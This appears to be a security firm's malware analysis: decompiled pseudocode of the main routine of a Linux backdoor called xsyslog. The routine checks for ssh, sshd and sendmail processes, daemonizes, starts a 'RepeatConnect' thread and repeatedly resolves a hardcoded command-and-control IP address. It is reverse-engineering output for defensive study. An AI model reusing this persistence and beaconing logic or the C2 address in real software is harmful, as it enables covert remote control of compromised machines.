//Caffeine Security Malware Analysis
//Main section of xsyslog

main(char _a4)
{// addr = 0x0804A490
    intOrPtr _v12;
    intOrPtr _v16;
    char _v20;
    intOrPtr _v24;
    intOrPtr _v28;
    _unknown_ _v32;
    _unknown_ _v36;
    _unknown_ _v40;
    _unknown_ _v44;
    _unknown_ _v48;
    _unknown_ _v52;
    _unknown_ _v56;
    _unknown_ _v60;
    _unknown_ _v68;
    _unknown_ _v72;
    _unknown_ _v76;
    _unknown_ _v80;
    _unknown_ _v82;
    _unknown_ _v84;
    intOrPtr _v104;
    intOrPtr _v108;
    _unknown_ _v116;
    _unknown_ _v148;
    _unknown_ _v180;
    _unknown_ _v184;
    char _v224;
    _unknown_ _v312;
    _unknown_ _v448;
    _unknown_ _v456;
    char _v496;
    _unknown_ _v600;
    _unknown_ _v608;
    char _v648;
    _unknown_ _v864;
    _unknown_ _v1136;
    _unknown_ _v1144;
    char _v1184;
    _unknown_ _v2164;
    _unknown_ _v2168;
    _unknown_ _v2172;
    _unknown_ _v2176;
    _unknown_ _v2180;
    _unknown_ _v2184;
    _unknown_ _v2188;
    _unknown_ _v2192;
    _unknown_ _v2196;
    char _v2208;
    intOrPtr _v2212;
    char* _v2216;
    intOrPtr _v2220;
    char* _v2224;
    char* _v2228;
    intOrPtr _v2236;
    _unknown_ _v2252;
    _unknown_ _v2256;
    intOrPtr _v2260;
    _unknown_ _v2264;
    _unknown_ _t172;
    _unknown_ _t173;
    _unknown_ _t174;
    char* _t176;
    _unknown_ _t183;
    _unknown_ _t186;
    _unknown_ _t188;
    _unknown_ _t189;
    _unknown_ _t190;
    _unknown_ _t191;
    _unknown_ _t193;
    _unknown_ _t195;
    _unknown_ _t196;
    _unknown_ _t197;
    _unknown_ _t199;
    _unknown_ _t200;
    _unknown_ _t201;
    _unknown_ _t203;
    _unknown_ _t206;
    _unknown_ _t208;
    _unknown_ _t210;
    _unknown_ _t211;
    _unknown_ _t212;
    _unknown_ _t213;
    _unknown_ _t214;
    _unknown_ _t215;
    _unknown_ _t216;
    _unknown_ _t217;
    _unknown_ _t218;
    _unknown_ _t219;
    _unknown_ _t220;
    _unknown_ _t221;
    _unknown_ _t222;
    _unknown_ _t223;
    _unknown_ _t224;
    _unknown_ _t225;
    _unknown_ _t228;
    _unknown_ _t230;
    _unknown_ _t232;
    _unknown_ _t234;
    _unknown_ _t235;
    _unknown_ _t236;
    _unknown_ _t237;
    _unknown_ _t239;
    _unknown_ _t241;
    _unknown_ _t243;
    _unknown_ _t244;
    _unknown_ _t245;
    _unknown_ _t247;
    _unknown_ _t248;
    _unknown_ _t249;
    _unknown_ _t250;
    _unknown_ _t251;
    _unknown_ _t252;
    char* _t253;
    _unknown_ _t254;
    _unknown_ _t255;
    _unknown_ _t256;
    _unknown_ _t257;
    _unknown_ _t258;
    _unknown_ _t259;
    _unknown_ _t260;
    _unknown_ _t261;
    _unknown_ _t262;
    _unknown_ _t263;
    _unknown_ _t264;
    _unknown_ _t265;
    _unknown_ _t266;
    _unknown_ _t268;
    _unknown_ _t269;
    _unknown_ _t270;
    _unknown_ _t271;
    _unknown_ _t272;
    _unknown_ _t273;
    _unknown_ _t274;
    _unknown_ _t275;
    char* _t277;
    _unknown_ _t281;
    _unknown_ _t284;
    _unknown_ _t291;
    _unknown_ _t292;
    _unknown_ _t295;
    _unknown_ _t296;
    _unknown_ _t297;
    _unknown_ _t299;
    _unknown_ _t302;
    _unknown_ _t304;
    _unknown_ _t307;
    _unknown_ _t309;
    _unknown_ _t312;
    _unknown_ _t314;
    _unknown_ _t317;
    _unknown_ _t318;
    _unknown_ _t319;
    _unknown_ _t322;
    _unknown_ _t329;
    _unknown_ _t332;
    _unknown_ _t333;
    signed int _t334;
    signed int _t335;
    _unknown_ _t337;

    _t253 =  &_a4;
    __esp = __esp & 240;
    _push( *((intOrPtr*)(_t253 - 4)));
    _push(_t333);
    _t334 = __esp;
    _push(_t245);
    _push(_t253);
    __esp = __esp - 32;
    _t246 =  *((intOrPtr*)(_t253 + 4));
    _t172 = get_pid(char * )(_t246, _t318,  &M08127689);
    _t336 = _t172;
    if(_t172 == 0) {
         *__esp = 1;
        L080B7700();
        goto L6;
    }
    L08048520(_t336, "ssh");
    L08048520(_t336, "sshd");
    L08048520(_t336, "sendmail");
    _t239 = L0804EB50(_t172, _t291, _t318);
    _t337 = _t239;
    if(_t337 < 0) {
        goto L6;
    }
    _t318 = _t318;
    if(_t337 != 0) {
        goto L6;
    }
    L080C36C0(_t246, _t291, _t318, "new insert!!");
    L080483E0( *_t246);
    daemon(_t318, 0, 0);
    _t241 = ssignal( *_t246, _t246, 15, 134513536);
    L080D9170(0);
    L080B7C50(_t241);
    L0804B720(_t246, _t318,  &_v20, 0,  &RepeatConnect, 0);
    while(1) {
        sleep(10);
    }
    goto L7;
L7:
    _push(_t334);
    _t335 = __esp;
    _push(_t292);
    _push(_t319);
    _push(_t246);
    __esp = __esp - 2204;
    _v108 = 3;
    _v104 = 0;
    _t173 = L0804CB50();
    L0804CB00(_t173);
    _v2224 =  &_v224;
    _t176 =  &_v1184;
    _v2228 =  &_v2208;
    _t277 =  &_v496;
    _v2216 =  &_v648;
    _v2220 = _t176;
    _v2212 = _t277;
    _v2236 = _t277;
    while(1) {
         *135692872 = 0;
        _v2260 = 0;
        L080E14D0(_t246, __esp, 2, 1);
        _v28 = 0;
        _v24 = 0;
        _v20 = 0;
        _v16 = 0;
        _v12 = 0;
         *135692872 = _t176;
        gethostbyname("216.83.44.226");
        __eflags = _t176;
        _v28 = _t176;
        if(_t176 == 0) {
            goto L37;
        } else {
            goto L14;
        }
    }
L6:
     *__esp = 0;
    L080B7700();
    _t319 = _t318;
    _t292 = _t291;
    goto L7;
}